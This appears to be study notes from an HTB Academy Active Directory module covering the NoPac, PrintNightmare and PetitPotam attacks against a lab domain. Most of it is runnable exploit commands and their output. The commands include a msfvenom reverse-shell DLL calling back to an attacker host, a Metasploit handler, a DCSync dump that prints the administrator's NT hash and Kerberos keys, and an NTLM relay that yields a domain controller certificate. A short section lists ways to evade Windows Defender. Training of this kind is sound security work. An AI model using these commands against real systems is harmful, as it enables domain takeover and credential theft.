⚑Bleeding Edge Vulnerabilities

🎯 HTB Academy: Active Directory Enumeration & Attacks

πŸ“ Overview

Bleeding Edge Vulnerabilities represent the latest and most critical Active Directory attack vectors discovered in recent years. These techniques leverage recently disclosed vulnerabilities that many organizations have not yet patched, providing opportunities for rapid domain compromise. This module covers three devastating attack techniques: NoPac (SamAccountName Spoofing), PrintNightmare, and PetitPotam (MS-EFSRPC) - all capable of achieving domain compromise from standard user accounts or even unauthenticated access.

πŸ”— Attack Chain Context

Complete Active Directory Compromise Timeline:

Standard User Access β†’ Bleeding Edge Exploitation β†’ Domain Controller Compromise β†’ Full Domain Control
   (Initial Access)       (Recent CVEs)            (SYSTEM/Admin Rights)        (Enterprise Owned)

Critical Characteristics:

  • Recent vulnerabilities: Released within 6-9 months (as of April 2022)

  • High impact: Direct path to Domain Controller compromise

  • Low privilege requirement: Standard domain user or unauthenticated access

  • Multiple attack vectors: Different exploitation methods for various scenarios

  • Patch management gap: Many organizations slow to deploy patches

🚨 Attack Techniques Overview

1. NoPac (SamAccountName Spoofing)

  • CVEs: CVE-2021-42278 and CVE-2021-42287

  • Requirements: Standard domain user credentials

  • Impact: Direct Domain Controller compromise and SYSTEM shell

  • Method: Computer account manipulation and Kerberos ticket spoofing

2. PrintNightmare

  • CVEs: CVE-2021-34527 and CVE-2021-1675

  • Requirements: Standard domain user credentials

  • Impact: Remote code execution and privilege escalation

  • Method: Print Spooler service exploitation

3. PetitPotam (MS-EFSRPC)

  • CVE: CVE-2021-36942

  • Requirements: Unauthenticated access (no credentials needed)

  • Impact: Domain compromise via certificate abuse

  • Method: NTLM relay to Active Directory Certificate Services

🎭 NoPac (SamAccountName Spoofing)

Vulnerability Overview

CVE Breakdown

CVE
Description
Impact

CVE-2021-42278

Security Account Manager (SAM) bypass vulnerability

Allows SamAccountName manipulation

CVE-2021-42287

Kerberos Privilege Attribute Certificate (PAC) vulnerability in ADDS

Enables privilege escalation via ticket spoofing

Attack Methodology

  1. Machine Account Creation: Add new computer account to domain (default quota: 10)

  2. Name Spoofing: Change SamAccountName to match Domain Controller

  3. Kerberos Exploitation: Request tickets using spoofed identity

  4. Privilege Escalation: Obtain SYSTEM-level access on Domain Controller

Prerequisites and Environment Setup

Tool Installation

# Install Impacket (required dependency)
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
python3 setup.py install

# Clone NoPac exploit repository
git clone https://github.com/Ridter/noPac.git
cd noPac

Attack Requirements

  • Domain credentials: Standard domain user account

  • Machine quota: ms-DS-MachineAccountQuota > 0 (default: 10)

  • Network access: Connectivity to Domain Controller

  • Tool dependencies: Impacket toolkit properly installed

Vulnerability Assessment

Scanning for NoPac Vulnerability

# Check if target is vulnerable to NoPac
sudo python3 scanner.py inlanefreight.local/forend:Klmcargo2 -dc-ip 172.16.5.5 -use-ldap

Expected Output (Vulnerable System):

β–ˆβ–ˆβ–ˆ    β–ˆβ–ˆ  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ   β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ   β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ 
β–ˆβ–ˆβ–ˆβ–ˆ   β–ˆβ–ˆ β–ˆβ–ˆ    β–ˆβ–ˆ β–ˆβ–ˆ   β–ˆβ–ˆ β–ˆβ–ˆ   β–ˆβ–ˆ β–ˆβ–ˆ      
β–ˆβ–ˆ β–ˆβ–ˆ  β–ˆβ–ˆ β–ˆβ–ˆ    β–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ      
β–ˆβ–ˆ  β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ    β–ˆβ–ˆ β–ˆβ–ˆ      β–ˆβ–ˆ   β–ˆβ–ˆ β–ˆβ–ˆ      
β–ˆβ–ˆ   β–ˆβ–ˆβ–ˆβ–ˆ  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ  β–ˆβ–ˆ      β–ˆβ–ˆ   β–ˆβ–ˆ  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ 
                                           
[*] Current ms-DS-MachineAccountQuota = 10
[*] Got TGT with PAC from 172.16.5.5. Ticket size 1484
[*] Got TGT from ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL. Ticket size 663

Key Vulnerability Indicators

  • Successful TGT retrieval: Indicates vulnerable Kerberos implementation

  • Machine account quota: Non-zero value allows attack execution

  • PAC validation: Vulnerable PAC handling mechanism present

Exploitation Methods

Method 1: Interactive Shell Access

# Obtain SYSTEM shell on Domain Controller
sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 -shell --impersonate administrator -use-ldap

Complete Attack Output:

β–ˆβ–ˆβ–ˆ    β–ˆβ–ˆ  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ   β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ   β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ 
β–ˆβ–ˆβ–ˆβ–ˆ   β–ˆβ–ˆ β–ˆβ–ˆ    β–ˆβ–ˆ β–ˆβ–ˆ   β–ˆβ–ˆ β–ˆβ–ˆ   β–ˆβ–ˆ β–ˆβ–ˆ      
β–ˆβ–ˆ β–ˆβ–ˆ  β–ˆβ–ˆ β–ˆβ–ˆ    β–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ      
β–ˆβ–ˆ  β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ    β–ˆβ–ˆ β–ˆβ–ˆ      β–ˆβ–ˆ   β–ˆβ–ˆ β–ˆβ–ˆ      
β–ˆβ–ˆ   β–ˆβ–ˆβ–ˆβ–ˆ  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ  β–ˆβ–ˆ      β–ˆβ–ˆ   β–ˆβ–ˆ  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ 
                                               
[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
[*] will try to impersonat administrator
[*] Adding Computer Account "WIN-LWJFQMAXRVN$"
[*] MachineAccount "WIN-LWJFQMAXRVN$" password = &A#x8X^5iLva
[*] Successfully added machine account WIN-LWJFQMAXRVN$ with password &A#x8X^5iLva.
[*] WIN-LWJFQMAXRVN$ object = CN=WIN-LWJFQMAXRVN,CN=Computers,DC=INLANEFREIGHT,DC=LOCAL
[*] WIN-LWJFQMAXRVN$ sAMAccountName == ACADEMY-EA-DC01
[*] Saving ticket in ACADEMY-EA-DC01.ccache
[*] Resting the machine account to WIN-LWJFQMAXRVN$
[*] Restored WIN-LWJFQMAXRVN$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating administrator
[*] 	Requesting S4U2self
[*] Saving ticket in administrator.ccache
[*] Remove ccache of ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
[*] Rename ccache with target ...
[*] Attempting to del a computer with the name: WIN-LWJFQMAXRVN$
[-] Delete computer WIN-LWJFQMAXRVN$ Failed! Maybe the current user does not have permission.
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>

Method 2: DCSync Attack

# Perform DCSync to extract administrator hash
sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 --impersonate administrator -use-ldap -dump -just-dc-user INLANEFREIGHT/administrator

DCSync Output:

[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
[*] will try to impersonat administrator
[*] Alreay have user administrator ticket for target ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
inlanefreight.local\administrator:500:aad3b435b51404eeaad3b435b51404ee:88ad09182de639ccc6579eb0849751cf:::
[*] Kerberos keys grabbed
inlanefreight.local\administrator:aes256-cts-hmac-sha1-96:de0aa78a8b9d622d3495315709ac3cb826d97a318ff4fe597da72905015e27b6
inlanefreight.local\administrator:aes128-cts-hmac-sha1-96:95c30f88301f9fe14ef5a8103b32eb25
inlanefreight.local\administrator:des-cbc-md5:70add6e02f70321f
[*] Cleaning up...

Post-Exploitation Considerations

Ticket Management

# Check for saved ccache files
ls -la *.ccache

# Typical files created:
# administrator_DC01.INLANEFREIGHT.local.ccache
# ACADEMY-EA-DC01.ccache

OPSEC Considerations

  • Semi-interactive shells: SMBExec.py creates noticeable artifacts

  • Service creation: BTOBTO and BTOBO services created during execution

  • Batch file execution: execute.bat files created and deleted for each command

  • AV/EDR detection: Shell establishment may trigger security alerts

πŸ–¨οΈ PrintNightmare

Vulnerability Overview

CVE Details

CVE
Description
Impact

CVE-2021-34527

Windows Print Spooler remote code execution vulnerability

RCE with SYSTEM privileges

CVE-2021-1675

Windows Print Spooler privilege escalation vulnerability

Local and remote privilege escalation

Attack Prerequisites

  • Print Spooler service: Must be running on target (default on all Windows)

  • Domain credentials: Standard domain user access required

  • Network connectivity: Access to target Domain Controller

  • Exploit dependencies: Cube0x0's modified Impacket version

Environment Setup and Dependencies

Tool Installation

# Clone the exploit repository
git clone https://github.com/cube0x0/CVE-2021-1675.git

# Install cube0x0's modified Impacket (CRITICAL for exploit success)
pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install

Service Enumeration

# Check for Print System protocols on target
rpcdump.py @172.16.5.5 | egrep 'MS-RPRN|MS-PAR'

# Expected output:
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol 
Protocol: [MS-RPRN]: Print System Remote Protocol

Exploit Execution Workflow

Step 1: Payload Generation

# Create malicious DLL payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.5.225 LPORT=8080 -f dll > backupscript.dll

# Output:
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 8704 bytes

Step 2: SMB Share Hosting

# Host payload on SMB share
sudo smbserver.py -smb2support CompData /path/to/backupscript.dll

# Expected output:
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Step 3: Metasploit Handler Configuration

# Start Metasploit and configure handler
[msf](Jobs:0 Agents:0) >> use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> set LHOST 172.16.5.225
LHOST => 172.16.5.225
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> set LPORT 8080
LPORT => 8080
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> run

[*] Started reverse TCP handler on 172.16.5.225:8080

Step 4: Exploit Execution

# Execute PrintNightmare exploit
sudo python3 CVE-2021-1675.py inlanefreight.local/forend:Klmcargo2@172.16.5.5 '\\172.16.5.225\CompData\backupscript.dll'

# Attack output:
[*] Connecting to ncacn_np:172.16.5.5[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\172.16.5.225\CompData\backupscript.dll
[*] Try 1...
[*] Stage0: 0
[*] Try 2...
[*] Stage0: 0
[*] Try 3...

Step 5: SYSTEM Shell Access

# Successful exploitation result
[*] Sending stage (200262 bytes) to 172.16.5.5
[*] Meterpreter session 1 opened (172.16.5.225:8080 -> 172.16.5.5:58048 ) at 2022-03-29 13:06:20 -0400

(Meterpreter 1)(C:\Windows\system32) > shell
Process 5912 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

Windows Defender Considerations

Detection Challenges

  • Service creation: BTOBTO service immediately flagged by Windows Defender

  • Batch file execution: execute.bat files trigger malicious behavior detection

  • Payload deployment: SMB-delivered DLL payloads often detected

  • VirTool detection: MSPSEexecCommand specifically identified by Defender

Evasion Strategies

  • Alternative payloads: Use different payload encoders or formats

  • Custom exploits: Modify exploit code to avoid signature detection

  • Living-off-the-land: Use legitimate Windows tools for post-exploitation

🎫 PetitPotam (MS-EFSRPC)

Vulnerability Overview

CVE-2021-36942 Details

  • Vulnerability Type: LSA spoofing vulnerability

  • Attack Method: NTLM relay to Active Directory Certificate Services

  • Authentication Required: None (unauthenticated attack)

  • Impact: Complete domain compromise via certificate abuse

  • Patch Status: Patched in August 2021

Attack Prerequisites

  • Active Directory Certificate Services (AD CS): Must be deployed in environment

  • Certificate Authority (CA): Web Enrollment interface accessible

  • Network access: Connectivity to Domain Controller and CA server

  • Tool requirements: ntlmrelayx.py and PetitPotam.py

Attack Architecture

Attack Flow Diagram

Attacker Host β†’ Domain Controller β†’ Certificate Authority β†’ Certificate Request
     ↓               ↓                       ↓                    ↓
PetitPotam.py β†’ NTLM Authentication β†’ Web Enrollment β†’ Base64 Certificate
     ↓                                                           ↓
ntlmrelayx.py ← ← ← ← ← ← ← ← ← ← ← ← ← ← ← ← ← ← ← ← ← ← ← ← ← ←

Exploitation Workflow

Step 1: NTLM Relay Setup

# Start ntlmrelayx.py targeting CA Web Enrollment
sudo ntlmrelayx.py -debug -smb2support --target http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp --adcs --template DomainController

# Relay server initialization:
Impacket v0.9.24.dev1+20211013.152215.3fe2d73a - Copyright 2021 SecureAuth Corporation

[+] Impacket Library Installation Path: /usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20211013.152215.3fe2d73a-py3.9.egg/impacket
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[+] Protocol Attack DCSYNC loaded..
[+] Protocol Attack HTTP loaded..
[+] Protocol Attack HTTPS loaded..
[+] Protocol Attack IMAP loaded..
[+] Protocol Attack IMAPS loaded..
[+] Protocol Attack LDAP loaded..
[+] Protocol Attack LDAPS loaded..
[+] Protocol Attack MSSQL loaded..
[+] Protocol Attack RPC loaded..
[+] Protocol Attack SMB loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server
[*] Setting up WCF Server

[*] Servers started, waiting for connections

Step 2: Authentication Coercion

# Execute PetitPotam to coerce DC authentication
python3 PetitPotam.py 172.16.5.225 172.16.5.5

PetitPotam Execution Output:

              ___            _        _      _        ___            _                     
             | _ \   ___    | |_     (_)    | |_     | _ \   ___    | |_    __ _    _ __   
             |  _/  / -_)   |  _|    | |    |  _|    |  _/  / _ \   |  _|  / _` |  | '  \  
            _|_|_   \___|   _\__|   _|_|_   _\__|   _|_|_   \___/   _\__|  \__,_|  |_|_|_| 
          _| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""| 
          "`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' 
                                         
              PoC to elicit machine account authentication via some MS-EFSRPC functions
                                      by topotam (@topotam77)
      
                     Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN

Trying pipe lsarpc
[-] Connecting to ncacn_np:172.16.5.5[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!

[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!

Step 3: Certificate Retrieval

Successful NTLM Relay and Certificate Generation:

[*] SMBD-Thread-4: Connection from INLANEFREIGHT/ACADEMY-EA-DC01$@172.16.5.5 controlled, attacking target http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL
[*] HTTP server returned error code 200, treating as a successful login
[*] Authenticating against http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL as INLANEFREIGHT/ACADEMY-EA-DC01$ SUCCEED
[*] SMBD-Thread-4: Connection from INLANEFREIGHT/ACADEMY-EA-DC01$@172.16.5.5 controlled, attacking target http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL
[*] HTTP server returned error code 200, treating as a successful login
[*] Authenticating against http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL as INLANEFREIGHT/ACADEMY-EA-DC01$ SUCCEED
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] GOT CERTIFICATE!
[*] Base64 certificate of user ACADEMY-EA-DC01$: 
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